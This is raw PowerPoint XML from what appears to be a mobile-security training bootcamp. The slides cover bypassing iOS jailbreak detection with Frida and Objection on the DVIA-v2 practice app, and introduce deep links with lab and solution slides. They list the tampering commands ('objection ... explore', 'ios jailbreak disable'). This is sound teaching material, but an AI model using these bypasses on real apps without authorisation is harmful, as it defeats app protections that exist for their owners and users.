            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1"/>
              <a:t>Having</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1"/>
              <a:t>Jailbroken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t> phone (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1"/>
              <a:t>virtual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1"/>
              <a:t>emulator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1"/>
              <a:t>Corellium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.corellium.com/compare/ios-simulator</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1700" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t>Frida server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1"/>
              <a:t>configured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1"/>
              <a:t>hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t> all applications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1"/>
              <a:t>installed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t> on the phone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" b="1" dirty="0" err="1"/>
              <a:t>Commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" b="1" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t>Check if the application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t> running :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frida-ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Uai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dvia</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0"/>
              <a:t>Run Objection :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objection -g 'DVIA-v2' explore </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Run the jailbreak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> bypass :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> jailbreak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>disable</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1"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dirty="0"/>
              <a:t>Bypass Jailbreak detection</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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91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800" b="1" dirty="0"/>
              <a:t>Option 2 : Objection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1"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en-US"/>
              <a:t>Exercice 3 : Bypass Jailbreak detection  [Solution]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-F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t="3357" r="36543" b="20882"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="391960" y="2420620"/>
            <a:ext cx="5429720" cy="3390584"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A75531FC-0FFF-40BD-8152-EA40E2E988B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6626270" y="2354710"/>
            <a:ext cx="2018532" cy="3522404"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="860684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t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>URIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>navigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> parts of an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Available</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>both</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Android and iOS platforms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Links can have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>schemes</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Example : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>A social media application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>registers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>socialapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>homepage</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> click to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>automaticalv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>directed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>apolication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Ability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>navigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>activities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> and pages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>socialapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>://profile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the profile page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>socialapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>://profile/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>profile_pic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the profile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>icture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the profile page</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dirty="0" err="1"/>
              <a:t>Labs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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DeepLinks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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327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a:t>Illustration :</a:t>
            </a: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dirty="0" err="1"/>
              <a:t>Labs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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DeepLinks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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andling Deep Links in iOS/Android/React Native | by Arnaud Ambroselli |  Medium">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EC27868-94EE-CB8B-4B98-C5056E10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650" y="2372249"/>
            <a:ext cx="5967215" cy="331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9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a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du texte 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>bootcamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="627447" y="2776451"/>
            <a:ext cx="2701964" cy="1853738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229694" y="2598034"/>
            <a:ext cx="3273238" cy="2210572"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379993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400" b="1" dirty="0" err="1"/>
              <a:t>Registring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> Links in Android</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>File : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>AndroidManifest.xml</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="14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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>DeepLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> [Solution]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"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42467" y="2342015"/>
            <a:ext cx="5415038" cy="2173970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="5032057"/>
            <a:ext cx="5438775" cy="466725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3210241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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Periscope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> an application for live </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>video</a:t>
            </a:r>
            <a:r>
